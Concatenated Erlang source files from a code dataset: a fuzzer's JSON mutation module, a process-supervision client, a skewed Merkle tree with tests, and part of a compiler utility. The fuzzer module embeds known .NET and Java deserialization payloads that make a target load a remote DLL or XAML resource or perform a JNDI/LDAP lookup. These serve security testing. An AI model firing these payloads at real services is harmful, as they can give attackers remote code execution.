Walker(Els, {Acc, CountT + 1, Count + 1});
Res ->
{Res, CountT + 1, Count + 1}
end;
Walker(El = {pair, El1, El2}, {Acc, CountT, Count}) ->
case Fun(El, CountT, Count + 1) of
false ->
case Walker(El1, {Acc, CountT, Count + 1}) of
{false, ChildTagCnt1, ChildCnt1} ->
case Walker(El2, {Acc, ChildTagCnt1, ChildCnt1}) of
{false, ChildTagCnt2, ChildCnt2} ->
{Acc, ChildTagCnt2, ChildCnt2};
Res2 -> Res2
end;
Res1 -> Res1
end;
Res -> {Res, CountT, Count + 1}
end;
Walker(El, {Acc, CountT, Count}) when is_list(El) ->
lists:foldl(fun(A, B) -> Walker(A, B) end, {Acc, CountT, Count}, El);
Walker(Elem, {Acc, CountT, Count}) ->
case Fun(Elem, CountT, Count + 1) of
false -> {Acc, CountT, Count + 1};
Res -> {Res, CountT, Count + 1}
end
end,
{false, 0, 0}, Ast).
test_walk(Ast) ->
walk(Ast,
fun (E, Acc, _, _N) ->
%io:format("~p is ~w~n", [E, N]),
[E|Acc]
end,
[]).
count(Ast) ->
walk(Ast,
fun
({Type, Els}, Acc, _, _N) when Type =:= object; Type =:= array ->
Els + Acc + 1;
({pair, El1, El2}, Acc, _, _N) ->
El1 + El2 + Acc + 1;
(_E, Acc, _, _N) ->
Acc + 1
end, 0).
select_elem(Ast, N) ->
{Res, _, _} = select(Ast,
fun
(Elem, _, I) when I =:= N ->
{Elem, I};
(_Elem, _, _I) ->
false
end),
Res.
select_tag(Ast, N) ->
{Res, _, _} = select(Ast,
fun
({object, _} = Elem, I, C) when I =:= N ->
{Elem, I, C};
({array, _} = Elem, I, C) when I =:= N ->
{Elem, I, C};
(_, _, _) ->
false
end),
Res.
replace_elem(Ast, R, El) ->
walk(Ast,
fun
(_Elem, Tree, _, I) when I == R ->
[El | Tree];
(Elem, Tree, _, _I) ->
[Elem | Tree]
end, []).
repeat_listhd(L, N) when N < 1 ->
L;
repeat_listhd([H | T], N) ->
repeat_listhd([H, H | T], N - 1).
repeat_elem(Ast, R, Times) ->
walk(Ast,
fun
(Elem, Tree, _, I) when I == R ->
repeat_listhd([Elem | Tree], Times);
(Elem, Tree, _, _I) ->
[Elem | Tree]
end, []).
insert_elem(Ast, R, NewElem) ->
walk(Ast,
fun
(Elem, Tree, _, I) when I == R ->
[NewElem, Elem | Tree];
(Elem, Tree, _, _I) ->
[Elem | Tree]
end, []).
%%%
%%% /JSON AST utils
%%%
%%%
%%% JSON AST -> Erlang simple structs
%%%
tokens_to_simpleast(Ast) when is_list(Ast) ->
lists:map(fun tokens_to_simpleast/1, Ast);
tokens_to_simpleast({object, Lst}) ->
{lists:map(fun tokens_to_simpleast/1, Lst)};
tokens_to_simpleast({array, Lst}) ->
lists:map(fun tokens_to_simpleast/1, Lst);
tokens_to_simpleast({pair, Key, Value}) ->
{tokens_to_simpleast(Key), tokens_to_simpleast(Value)};
tokens_to_simpleast({string, Value}) ->
{string, Value};
tokens_to_simpleast({number, Value}) ->
try list_to_integer(Value) of
Int -> Int
catch error:badarg ->
try list_to_float(Value) of
Float -> Float
catch error:badarg ->
invalid_number
end
end;
tokens_to_simpleast(Token) ->
Token.
%%%
%%% /JSON AST -> Erlang simple structs
%%%
%%%
%%% JSON Simple AST Folder
%%%
fold_simpleast(H, Acc) when is_list(H) ->
lists:flatten([$[, fold_list(fun (A) -> fold_simpleast(A, []) end, H, []), $] | Acc]);
fold_simpleast({H}, Acc) when is_list(H) ->
lists:flatten([${, fold_list(fun (A) -> fold_simpleast(A, []) end, H, []), $} | Acc]);
fold_simpleast({string, A}, Acc) ->
lists:flatten([$", A, $" | Acc]);
fold_simpleast({A, B}, Acc) ->
lists:flatten([fold_simpleast(A, Acc), $:, fold_simpleast(B, Acc) | Acc]);
fold_simpleast(A, Acc) when is_integer(A);is_float(A) ->
[lists:flatten(io_lib:format("~p", [A])) | Acc];
fold_simpleast([], Acc) ->
lists:flatten(Acc);
fold_simpleast(A, Acc) ->
[A | Acc].
%%%
%%% /JSON Simple AST Folder
%%%
%%%
%%% Mutators
%%%
%% TODO: sometimes it creates object: values pairs, FIXME: fix it
pump_path(Start, _End, 0) -> Start;
pump_path(Start, End, N) ->
%io:format("Pumping... iter ~w start ~w I = ~w~n", [N, Start, End]),
{PumpedTag, _, _} =
walk([Start],
fun
(_Elem, Tree, _, I) when I =:= End ->
[Start | Tree];
(Elem, Tree, _, _) ->
[Elem | Tree]
end, []),
%io:format("Pumping... iter ~w res ~w~n", [N, PumpedTag]),
pump_path(hd(PumpedTag), End*2 - 1, N - 1).
json_pump(Ast, 0) -> {Ast, 0, 0};
json_pump(Ast, T) ->
%io:format("Cnt: ~w ~w~n", [Ast, N]),
R = erlamsa_rnd:erand(T),
%io:format("R:!!!!!!!!!!!!!!!!!! ~w~n", [R]),
{Start, R, StartPlace} = select_tag(Ast, R),
%io:format("Start:!!!!!!!!!!!!!!!!!! ~w ~p ~p~n", [Res, T, R]),
{_, _, SubElems} = count([Start]),
%io:format("SubElems:!!!!!!!!!!!!!!!!!! ~w~n", [SubElems]),
E = erlamsa_rnd:erand(SubElems - 1) + 1, %% not the tag itself
%io:format("E:!!!!!!!!!!!!!!!!!! ~w~n", [E]),
%{End, _, _} = select_elem([Start], E),
%io:format("End:!!!!!!!!!!!!!!!!!! ~w~n", [End]),
PumpCnt = 2, %erlamsa_rnd:erand( trunc(1000.0/(100.0 + SubElems)) ),
% ^-- limiting the depth of the pump
%io:format("PumpCnt:!!!!!!!!!!!!!!!!!! ~w~n", [PumpCnt]),
Pumped = pump_path(Start, E, PumpCnt),
%io:format("PUMPED!!!!!!!!!! ~w~n", [Pumped]),
replace_elem(Ast, StartPlace, Pumped).
json_dup(Ast, N) ->
R = erlamsa_rnd:erand(N),
repeat_elem(Ast, R, 1).
json_repeat(Ast, N) ->
R = erlamsa_rnd:erand(N),
repeat_elem(Ast, R, erlamsa_rnd:erand(100)).
json_swap(Ast, N) ->
R1 = erlamsa_rnd:erand(N),
R2 = erlamsa_rnd:erand(N),
{Elem1, R1} = select_elem(Ast, R1),
{Elem2, R2} = select_elem(Ast, R2),
walk(Ast,
fun
(_Elem, Tree, _, I) when I == R1 ->
[Elem2 | Tree];
(_Elem, Tree, _, I) when I == R2 ->
[Elem1 | Tree];
(Elem, Tree, _, _I) ->
[Elem | Tree]
end, []).
json_insert(Ast, N) ->
R1 = erlamsa_rnd:erand(N),
R2 = erlamsa_rnd:erand(N),
{NewElem, R1} = select_elem(Ast, R1),
insert_elem(Ast, R2, NewElem).
%%%
%%% /Mutators
%%%
%%%
%%% Mutations
%%%
%% Payloads from Friday the 13th JSON Attacks paper by <NAME> & <NAME> HPE Software Security Research
%% from https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
%% and generated by https://github.com/pwntester/ysoserial.net tool
%% Assuming MIT licence (as in https://github.com/pwntester/ysoserial.net/blob/master/LICENSE.txt),
%% please create issue if this is incorrect and
%% should be removed due to copyright issues
%% TODO: add more payloads
%% Beginning of payloads from upper links.
json_unserialize_bugs() ->
[
{"{\"__type\":\"System.Windows.Application, PresentationFramework,Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\",\"Resources\":{\"__type\":\"System.Windows.ResourceDictionary,PresentationFramework, Version=4.0.0.0, Culture=neutral,PublicKeyToken=31bf3856ad364e35\",\"Source\":\"http~sJsonDotNet/Xamlpayload\"}}",1},
{"{\"$type\":\"System.Configuration.Install.AssemblyInstaller,System.Configuration.Install, Version=4.0.0.0, Culture=neutral,PublicKeyToken=<KEY>\",\"Path\":\"http~sJsonDotNet/RemoteLibrary.dll\"}",1},
{"{\"$type\":\"System.Windows.Forms.BindingSource, System.Windows.Forms,Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\",\"DataMember\":\"HelpText\",\"dataSource\":{\"$type\":\"System.Configuration.Install.AssemblyInstalle r, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=<KEY>\",\"Path\":\"http~sJsonDotNet/RemoteLibrary.dll\"}}",1},
{"{\"@class\":\"org.hibernate.jmx.StatisticsService\",\"sessionFactoryJNDIName\":\"ldap~suid=somename,ou=someou,dc=somedc\"}",1},
{"{\"@class\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"ldap:~suid=somename,ou=someou,dc=somed c\", \"autoCommit\":true}",1},
{"{\"@class\":\" com.atomikos.icatch.jta.RemoteClientUserTransaction\", \"name_\":\"ldap~suid=somename,ou=someou,dc=somedc\", \"providerUrl_\":\"ldap~s\"}",2}
].
%% /End of payloads from upper links.
make_json_unserialize() ->
Uri = lists:flatten(erlamsa_mutations:get_ssrf_uri()),
{Payload, Repeats} = erlamsa_rnd:rand_elem(json_unserialize_bugs()),
list_to_binary(lists:flatten(io_lib:format(Payload, [Uri || _ <- lists:seq(1,Repeats)]))).
mutate_innertext_prob(String, _Muta, Prob, Rnd) when Rnd > Prob ->
{[], String}; %% No mutations
mutate_innertext_prob(String, Muta, _Prob, _Rnd) ->
Binary = list_to_binary(String),
{_NewMuta, NewLstBin, Meta} = Muta([Binary], []),
%%io:format("res: ~p~n", [{NewLstBin, Meta}]),
{Meta, binary_to_list(hd(NewLstBin))}.
%% Prevent too much JSONish on non-JSON data
json_mutation(Ast, {N, 0}) when N < 2 ->
case {erlamsa_rnd:erand(7), N} of
{4, 1} -> json_mutation(Ast, {N, 0}, erlamsa_rnd:rand(8));
_Else -> {[{failed, json}], Ast, -1}
end;
json_mutation(Ast, {N, NT}) ->
json_mutation(Ast, {N, NT}, erlamsa_rnd:rand(8)).
json_mutation(Ast, {N, _NT}, 0) ->
{Res, _, _} = json_swap(Ast, N),
{[{json_swap, 1}], Res, 1};
json_mutation(Ast, {N, _NT}, 1) ->
{Res, _, _} = json_dup(Ast, N),
{[{json_dup, 1}], Res, 1};
json_mutation(Ast, {_N, NT}, 2) ->
{Res, _, _} = json_pump(Ast, NT),
{[{json_pump, 1}], Res, -2}; %% don't allow too much pumps...
json_mutation(Ast, {N, _NT}, 3) ->
{Res, _, _} = json_repeat(Ast, N),
{[{json_repeat, 1}], Res, 1};
json_mutation(Ast, {N, _NT}, 4) ->
{Res, _, _} = json_insert(Ast, N),
{[{json_insert, 1}], Res, 1};
json_mutation(_Ast, {_N, _NT}, 5) ->
{[{json_unserialize, 1}], make_json_unserialize(), 1};
json_mutation(Ast, {N, _NT}, _R) when N > 0 -> %% Prob = 25% for inner mutation
Muta = erlamsa_mutations:mutators_mutator(erlamsa_mutations:inner_mutations()),
{Res, Meta} = walk2acc(Ast,
fun
({string, String}, Tree, InnerMeta) ->
{NewMeta, NewString} = mutate_innertext_prob(String, Muta, 3/N, erlamsa_rnd:rand_float()),
{[{string, NewString} | Tree], [NewMeta | InnerMeta]};
(El, Tree, InnerMeta) ->
{[El | Tree], InnerMeta}
end, {[], []}),
{[Meta, {json_innertext,1}], Res, 1};
json_mutation(Ast, _, _) ->
{[], Ast, -1}.
json_mutate(Ll = [H|T], Meta) ->
%io:format("Trying to parse... ~p~n", [size(H)]),
%file:write_file("./last_json.txt", H),
%% FIXME: count tags while tokenizing?
try tokenize(H) of
Tokens ->
{N, NT, N} = count(Tokens),
{NewMeta, Res, D} = json_mutation(Tokens, {N, NT}),
NewBinStr = fold_ast(Res),
if
NewBinStr =:= H ->
{fun json_mutate/2, Ll, NewMeta, -1};
true ->
{fun json_mutate/2, [NewBinStr | T], [NewMeta|Meta],
D + trunc(size(NewBinStr)/(?AVG_BLOCK_SIZE*10))} %% limiting next rounds based on a size
end
catch
incorrect_json ->
{fun json_mutate/2, Ll, [{failed, json}|Meta], -1}
end. | src/erlamsa_json.erl | 0.640861 | 0.469034 | erlamsa_json.erl | starcoder |
-module(parent_client).
-export([children/1,
child_pid/2, child_meta/2,
start_child/2, start_child/3, %restart_child/2,
shutdown_child/2,
shutdown_all/1, shutdown_all/2,
%return_children/2,
update_child_meta/3,
whereis_name/1]).
%% ----------------------------------------------------------------------------
%% @doc
%% Functions for interacting with parent's children from other processes.
%%
%% All of these functions issue a call to the parent process. Therefore, they can't be used from
%% inside the parent process. Use functions from the `Parent` module instead to interact with the
%% children from within the process.
%%
%% Likewise these functions can't be invoked inside the child process during its initialization.
%% Defer interacting with the parent to `gen_server:handle_continue/2`, or if you're using another
%% behaviour which doesn't support such callback, send yourself a message to safely do the post-init
%% interaction with the parent.
%% @end
%% ----------------------------------------------------------------------------
%% ----------------------------------------------------------------------------
%% @doc Client interface to `parent:children/0`.
%% ----------------------------------------------------------------------------
-spec children(gen_server:server_ref()) -> [parent:child()].
children(Parent) -> call(Parent, children).
%case parent_registry:table(Parent) of
% {ok, Table} -> parent_registry:children(Table);
% error ->
% call(Parent, children)
%end.
%% @doc Client interface to `parent:child_pid/1`.
-spec child_pid(gen_server:server_ref(), parent:child_id()) -> {ok, pid()} | error.
child_pid(Parent, ChildId) -> call(Parent, child_pid, [ChildId]).
%case parent_registry:table(Parent) of
% {ok, Table} -> parent_registry:child_pid(Table, ChildId)
% error -> call(Parent, child_pid, [ChildId])
%end.
%% @doc Client interface to `parent:child_meta/1`.
-spec child_meta(gen_server:server_ref(), parent:child_ref()) -> {ok, parent:child_meta()} | error.
child_meta(Parent, ChildRef) -> call(Parent, child_meta, [ChildRef]).
%case parent_registry:table(Parent) of
% {ok, Table} -> parent_registry:child_meta(Table, ChildRef);
% error -> call(Parent, child_meta, [ChildRef])
%end.
%% @doc Client interface to `parent:start_child/2`.
-spec start_child(
gen_server:server_ref(),
parent:start_spec(),
map() | list({term(), term()})
) -> parent:on_start_child().
start_child(Parent, ChildSpec) -> start_child(Parent, ChildSpec, []).
start_child(Parent, ChildSpec, Overrides) ->
call(Parent, start_child, [ChildSpec, Overrides], infinity).
%% @doc Client interface to `parent:shutdown_child/1`.
-spec shutdown_child(gen_server:server_ref(), parent:child_ref()) -> ok.
% {ok, parent:stopped_children()} | error.
shutdown_child(Parent, ChildRef) ->
call(Parent, shutdown_child, [ChildRef], infinity).
%% @doc Client interface to `parent:restart_child/1`.
%-spec restart_child(gen_server:server_ref(), parent:child_ref()) -> ok | error.
%restart_child(Parent, ChildRef) ->
% call(Parent, restart_child, [ChildRef], infinity).
%% @doc Client interface to `parent:shutdown_all/1`.
-spec shutdown_all(gen_server:server_ref(), any()) -> ok. %parent:stopped_children().
shutdown_all(ServerRef) -> shutdown_all(ServerRef, shutdown).
shutdown_all(ServerRef, Reason) ->
call(ServerRef, shutdown_all, [Reason], infinity).
%% @doc "Client interface to `parent:return_children/1`."
%-spec return_children(gen_server:server_ref(), parent:stopped_children()) -> ok.
%return_children(Parent, StoppedChildren) ->
% call(Parent, return_children, [StoppedChildren], infinity).
%% @doc Client interface to `parent:update_child_meta/2`"
-spec update_child_meta(
gen_server:server_ref(),
parent:child_ref(),
fun((parent:child_meta()) -> parent:child_meta())
) -> ok | error.
update_child_meta(Parent, ChildRef, Updater) ->
call(Parent, update_child_meta, [ChildRef, Updater], infinity).
%@doc false
whereis_name({Parent, ChildId}) ->
case child_pid(Parent, ChildId) of
{ok, Pid} -> Pid;
error -> undefined
end.
%%%----------------------------------------------------------------------------
%%% Internal functions:
%%%----------------------------------------------------------------------------
call(ServerRef, Function) -> call(ServerRef, Function, []).
call(ServerRef, Function, Args) -> call(ServerRef, Function, Args, 5000).
call(ServerRef, Function, Args, Timeout) when
(is_integer(Timeout) andalso Timeout >= 0) orelse Timeout =:= infinity ->
%% This is the custom implementation of a call. We're not using standard gen_server calls to
%% ensure that this call won't end up in some custom behaviour's handle_call.
Req = {?MODULE, Function, Args},
case gen_server_parent:whereis(ServerRef) of
undefined ->
exit({noproc, {?MODULE, call, [ServerRef, Req, Timeout]}});
Pid when Pid == self() ->
exit({calling_self, {?MODULE, call, [ServerRef, Req, Timeout]}});
Pid ->
try gen:call(Pid, '$parent_call', Req, Timeout) of
{ok, Res} -> Res
catch
exit:Reason ->
exit({Reason, {?MODULE, call, [ServerRef, Req, Timeout]}})
end
end. | src/parent_client.erl | 0.586878 | 0.446555 | parent_client.erl | starcoder |
%% @doc A module with a skewed merkle tree implementation as described
%% in https://medium.com/codechain/skewed-merkle-tree-259b984acc0c.
%% This module implements a skewed merkle tree where value can be added/stacked via add/2,
%% the time and memory it takes to create is linearly proportional to the number of values.
-module(skewed).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-export([
new/0, new/1, new/2,
add/2, gen_proof/2, verify_proof/3,
root_hash/1, height/1, count/1,
hash_value/2,
contains/2
]).
-record(leaf, {
hash :: hash()
}).
-record(empty, {
hash = <<0:256>> :: hash()
}).
-record(node, {
hash :: hash(),
height = 0 :: non_neg_integer(),
left :: #node{} | #empty{},
right :: leaf()
}).
-record(skewed, {
root = #empty{} :: tree(),
count = 0 :: non_neg_integer(),
hash_function = fun hash_value/2 :: hash_function()
}).
-type hash() :: binary().
-type skewed() :: #skewed{}.
-type leaf() :: #leaf{}.
-type tree() :: #empty{} | #node{}.
-define(LEAF_PREFIX, 0).
-define(NODE_PREFIX, 1).
-type hash_function() :: fun((term(), 0 | 1) -> hash()).
-export_type([skewed/0, hash/0, hash_function/0]).
%% @doc
%% Create new empty skewed merkle tree.
%% @end
-spec new() -> skewed().
new() ->
#skewed{}.
-spec new(hash() | hash_function()) -> skewed().
new(Hash) when is_binary(Hash) ->
#skewed{root=#empty{hash=Hash}};
new(HashFunction) when is_function(HashFunction) ->
#skewed{hash_function=HashFunction}.
-spec new(hash(), hash_function()) -> skewed().
new(Hash, HashFunction) ->
#skewed{root=#empty{hash=Hash}, hash_function=HashFunction}.
%% @doc
%% Add/stack new value (leaf) on top and recalculate root hash.
%% @end
-spec add(any(), skewed()) -> skewed().
add(Value, #skewed{root=Tree, count=Count, hash_function=HashFun}=Skewed) ->
Leaf = to_leaf(Value, HashFun),
Node = to_node(Tree, Leaf, tree_hash(Tree), leaf_hash(Leaf), HashFun, Count),
Skewed#skewed{root=Node, count=Count+1}.
%% @doc
%% Generate a proof that `Value' appears in `Tree' by returning the list of
%% required sibling hashes and the root hash of the tree.
%% @end
-spec gen_proof(any(), skewed()) -> not_found | [hash(),...].
gen_proof(_Value, #skewed{count=0}) ->
not_found;
gen_proof(Value, #skewed{root=Tree, hash_function=HashFun}) ->
Hash = HashFun(Value, ?LEAF_PREFIX),
case contains(Tree, Hash, [tree_hash(Tree)]) of
false -> not_found;
Proof -> Proof
end.
%% @doc
%% Verify will check that the HashToVerify is correctly in the tree with the provided,
%% in order, lists of hashes (proof) and compare it to the RootHash.
%% @end
-spec verify_proof(hash(), hash_function(), [hash(),...]) -> boolean().
verify_proof(HashToVerify, _HashFun, [RootHash]) ->
HashToVerify == RootHash;
verify_proof(HashToVerify, HashFun, [FirstHash|Hashes]) ->
RH = lists:last(Hashes),
FirstEmpty = #empty{hash=FirstHash},
Result = lists:foldl(
fun(RootHash, Acc) when RootHash == RH ->
?MODULE:root_hash(Acc) == RootHash;
(Hash, #skewed{root=Tree, count=Count}=Acc) ->
Leaf = to_leaf(Hash),
Node = to_node(Tree, Leaf, tree_hash(Tree), leaf_hash(Leaf), HashFun, Count),
Acc#skewed{root=Node, count=Count+1}
end,
#skewed{root=FirstEmpty, count=0},
[HashToVerify|Hashes]
),
Result == true.
%% @doc
%% Gets the root hash of the given skewed tree. This is a fast
%% operation since the hash was calculated on construction of the tree.
%% @end
-spec root_hash(skewed()) -> hash().
root_hash(#skewed{root=Tree}) ->
tree_hash(Tree).
%% @doc
%% Get the height of the given skewed tree. This is a fast operation
%% since the height was calculated on construction of the tree.
%% @end
-spec height(skewed()) -> non_neg_integer().
height(#skewed{root=Tree}) ->
tree_height(Tree).
%% @doc
%% get the number of leaves int he skewed tree.
%% @end
-spec count(skewed()) -> non_neg_integer().
count(#skewed{count=Count}) ->
Count.
%% @doc
%% A commonly used hash value for skewed trees. This function
%% will SHA256 hash the given value when it is binary. A convenience
%% form detects non-binary forms and uses term_to_binary/1 to convert
%% other erlang terms to a binary form. It is not recommended to use
%% the non-binary form if the resulting trees or proofs are to be sent
%% over a network.
%% @end
-spec hash_value(any(), 0 | 1) -> hash().
hash_value(Value, Prefix) when is_binary(Value) ->
crypto:hash(sha256, <<Prefix:8/integer, Value/binary>>);
hash_value(Value, Prefix) ->
hash_value(term_to_binary(Value), Prefix).
%% @doc
%% Check if the skewed tree contains a value.
%% @end
-spec contains(skewed() | tree(), any()) -> boolean().
contains(#skewed{count=0}, _Value) ->
false;
contains(#skewed{root=Tree}, Value) ->
Hash = hash_value(Value, ?LEAF_PREFIX),
case contains(Tree, Hash, []) of
false -> false;
_ -> true
end.
%%====================================================================
%% Internal functions
%%====================================================================
-spec contains(tree(), hash(), [hash()]) -> false | [hash(),...].
contains(#empty{}, _, _Acc) ->
false;
contains(#node{right=#leaf{hash=Hash}, left=Left}, Hash, Acc) ->
[tree_hash(Left)|Acc];
contains(#node{left=Left, right=#leaf{hash=RightHash}}, Hash, Acc) ->
contains(Left, Hash, [RightHash|Acc]).
-spec to_leaf(hash()) -> leaf().
to_leaf(Hash) ->
#leaf{hash=Hash}.
-spec to_leaf(term(), hash_function()) -> leaf().
to_leaf(Value, HashFun) ->
#leaf{hash=HashFun(Value, ?LEAF_PREFIX)}.
-spec to_node(tree(), leaf(), hash(), hash(), hash_function(), non_neg_integer()) -> tree().
to_node(L, R, LHash, RHash, HashFun, Height) ->
Hash = HashFun(<<LHash/binary, RHash/binary>>, ?NODE_PREFIX),
#node{left=L, right=R, height=Height+1, hash=Hash}.
-spec leaf_hash(leaf()) -> hash().
leaf_hash(#leaf{hash=Hash}) ->
Hash.
-spec tree_hash(tree()) -> hash().
tree_hash(#node{hash=Hash}) ->
Hash;
tree_hash(#empty{hash=Hash}) ->
Hash.
-spec tree_height(tree()) -> non_neg_integer().
tree_height(#node{height=Height}) ->
Height;
tree_height(#empty{}) ->
0.
%% ------------------------------------------------------------------
%% EUNIT Tests
%% ------------------------------------------------------------------
-ifdef(TEST).
new_test() ->
Tree = new(<<1,2,3>>),
?assertEqual(<<1,2,3>>, ?MODULE:root_hash(Tree)),
?assertEqual(0, ?MODULE:count(Tree)).
verify_test() ->
HashFun = fun hash_value/2,
Size = 5,
Tree = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(),
lists:seq(1, Size)
),
RootHash = ?MODULE:root_hash(Tree),
Value = 3,
%% this is the hash of the node adjacent to the leaf with value 3 (`Value')
Hash2 = <<253,49,101,79,133,255,101,251,21,117,172,62,98,57,87,84,34,25,155,89,71,139,184,212,1,255,127,234,83,163,195,155>>,
ValueHashes = lists:foldr(fun(V, A) -> [HashFun(V, ?LEAF_PREFIX)|A] end, [], lists:seq(Value+1, Size)),
ExpectedProof = [Hash2] ++ ValueHashes ++ [RootHash],
?assertEqual(ExpectedProof, gen_proof(Value, Tree)),
?assert(verify_proof(HashFun(Value, ?LEAF_PREFIX), HashFun, ExpectedProof)),
?assertNot(verify_proof(HashFun(Value, ?LEAF_PREFIX), HashFun, [RootHash])),
?assert(verify_proof(RootHash, HashFun, [RootHash])),
ok.
proof_test() ->
HashFun = fun hash_value/2,
?assertEqual(not_found, gen_proof(lol, new())),
Size = 5,
Tree = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(HashFun(7, ?LEAF_PREFIX)),
lists:seq(1, Size)
),
?assertEqual(not_found, gen_proof(10, Tree)),
?assertNotEqual(not_found, gen_proof(2, Tree)),
?assertEqual(not_found, gen_proof(7, Tree)),
ok.
contains_test() ->
Size = 5,
Tree = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(),
lists:seq(1, Size)
),
?assertEqual(true, lists:all(fun(I) ->
true == contains(Tree, I)
end,
lists:seq(1, Size))),
?assertEqual(true, lists:all(fun(I) ->
false == contains(Tree, I)
end,
lists:seq(-10, 0))),
%% Check that empty tree contains no value
Tree2 = new(),
?assertEqual(true, lists:all(fun(I) ->
false == contains(Tree2, I)
end,
lists:seq(-1, 10))),
ok.
height_test() ->
Tree0 = new(),
?assertEqual(0, height(Tree0)),
Tree1 = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(),
lists:seq(1, 10)
),
io:format("Tree1: ~p~n", [Tree1]),
?assertEqual(10, height(Tree1)),
?assertEqual(0, tree_height(#empty{hash= <<>>})),
ok.
construct_test() ->
Tree0 = new(crypto:hash(sha256, "yolo")),
?assertEqual(0, height(Tree0)),
Tree1 = add("hello", Tree0),
?assertEqual(1, height(Tree1)),
Tree2 = add("namaste", Tree1),
?assertEqual(2, height(Tree2)),
ok.
count_test() ->
Tree0 = new(),
?assertEqual(0, count(Tree0)),
Tree1 = lists:foldl(
fun(Value, Acc) ->
add(Value, Acc)
end,
new(),
lists:seq(1, 10)
),
?assertEqual(10, count(Tree1)),
ok.
-endif. | src/skewed.erl | 0.835047 | 0.560012 | skewed.erl | starcoder |
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 2007-2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
%% Purpose : Common utilities used by several optimization passes.
%%
-module(beam_utils).
-export([is_killed/3,is_killed_at/3,is_not_used/3,
empty_label_index/0,index_label/3,index_labels/1,replace_labels/4,
code_at/2,bif_to_test/3,is_pure_test/1,
combine_heap_needs/2,
split_even/1
]).
-export_type([code_index/0,module_code/0,instruction/0]).
-import(lists, [flatmap/2,map/2,member/2,sort/1,reverse/1]).
-define(is_const(Val), (Val =:= nil orelse
element(1, Val) =:= integer orelse
element(1, Val) =:= float orelse
element(1, Val) =:= atom orelse
element(1, Val) =:= literal)).
%% instruction() describes all instructions that are used during optimzation
%% (from beam_a to beam_z).
-type instruction() :: atom() | tuple().
-type code_index() :: gb_trees:tree(beam_asm:label(), [instruction()]).
-type int_function() :: {'function',beam_asm:function_name(),arity(),
beam_asm:label(),[instruction()]}.
-type module_code() ::
{module(),[_],[_],[int_function()],pos_integer()}.
%% Internal types.
-type fail() :: beam_asm:fail() | 'fail'.
-type test() :: {'test',atom(),fail(),[beam_asm:src()]} |
{'test',atom(),fail(),integer(),list(),beam_asm:reg()}.
-type result_cache() :: gb_trees:tree(beam_asm:label(), 'killed' | 'used').
-record(live,
{lbl :: code_index(), %Label to code index.
res :: result_cache()}). %Result cache for each label.
%% is_killed(Register, [Instruction], State) -> true|false
%% Determine whether a register is killed by the instruction sequence.
%% If true is returned, it means that the register will not be
%% referenced in ANY way (not even indirectly by an allocate instruction);
%% i.e. it is OK to enter the instruction sequence with Register
%% containing garbage.
%%
%% The state (constructed by index_instructions/1) is used to allow us
%% to determine the kill state across branches.
-spec is_killed(beam_asm:reg(), [instruction()], code_index()) -> boolean().
is_killed(R, Is, D) ->
St = #live{lbl=D,res=gb_trees:empty()},
case check_liveness(R, Is, St) of
{killed,_} -> true;
{exit_not_used,_} -> false;
{_,_} -> false
end.
%% is_killed_at(Reg, Lbl, State) -> true|false
%% Determine whether Reg is killed at label Lbl.
-spec is_killed_at(beam_asm:reg(), beam_asm:label(), code_index()) -> boolean().
is_killed_at(R, Lbl, D) when is_integer(Lbl) ->
St0 = #live{lbl=D,res=gb_trees:empty()},
case check_liveness_at(R, Lbl, St0) of
{killed,_} -> true;
{exit_not_used,_} -> false;
{_,_} -> false
end.
%% is_not_used(Register, [Instruction], State) -> true|false
%% Determine whether a register is never used in the instruction sequence
%% (it could still be referenced by an allocate instruction, meaning that
%% it MUST be initialized, but that its value does not matter).
%% The state is used to allow us to determine the usage state
%% across branches.
-spec is_not_used(beam_asm:reg(), [instruction()], code_index()) -> boolean().
is_not_used(R, Is, D) ->
St = #live{lbl=D,res=gb_trees:empty()},
case check_liveness(R, Is, St) of
{used,_} -> false;
{exit_not_used,_} -> true;
{_,_} -> true
end.
%% index_labels(FunctionIs) -> State
%% Index the instruction sequence so that we can quickly
%% look up the instruction following a specific label.
-spec index_labels([instruction()]) -> code_index().
index_labels(Is) ->
index_labels_1(Is, []).
%% empty_label_index() -> State
%% Create an empty label index.
-spec empty_label_index() -> code_index().
empty_label_index() ->
gb_trees:empty().
%% index_label(Label, [Instruction], State) -> State
%% Add an index for a label.
-spec index_label(beam_asm:label(), [instruction()], code_index()) ->
code_index().
index_label(Lbl, Is0, Acc) ->
Is = drop_labels(Is0),
gb_trees:enter(Lbl, Is, Acc).
%% code_at(Label, State) -> [I].
%% Retrieve the code at the given label.
-spec code_at(beam_asm:label(), code_index()) -> [instruction()].
code_at(L, Ll) ->
gb_trees:get(L, Ll).
%% replace_labels(FunctionIs, Tail, ReplaceDb, Fallback) -> FunctionIs.
%% Replace all labels in instructions according to the ReplaceDb.
%% If label is not found the Fallback is called with the label to
%% produce a new one.
-spec replace_labels([instruction()],
[instruction()],
#{beam_asm:label() => beam_asm:label()},
fun((beam_asm:label()) -> term())) -> [instruction()].
replace_labels(Is, Acc, D, Fb) ->
replace_labels_1(Is, Acc, D, Fb).
%% bif_to_test(Bif, [Op], Fail) -> {test,Test,Fail,[Op]}
%% Convert a BIF to a test. Fail if not possible.
-spec bif_to_test(atom(), list(), fail()) -> test().
bif_to_test(is_atom, [_]=Ops, Fail) -> {test,is_atom,Fail,Ops};
bif_to_test(is_boolean, [_]=Ops, Fail) -> {test,is_boolean,Fail,Ops};
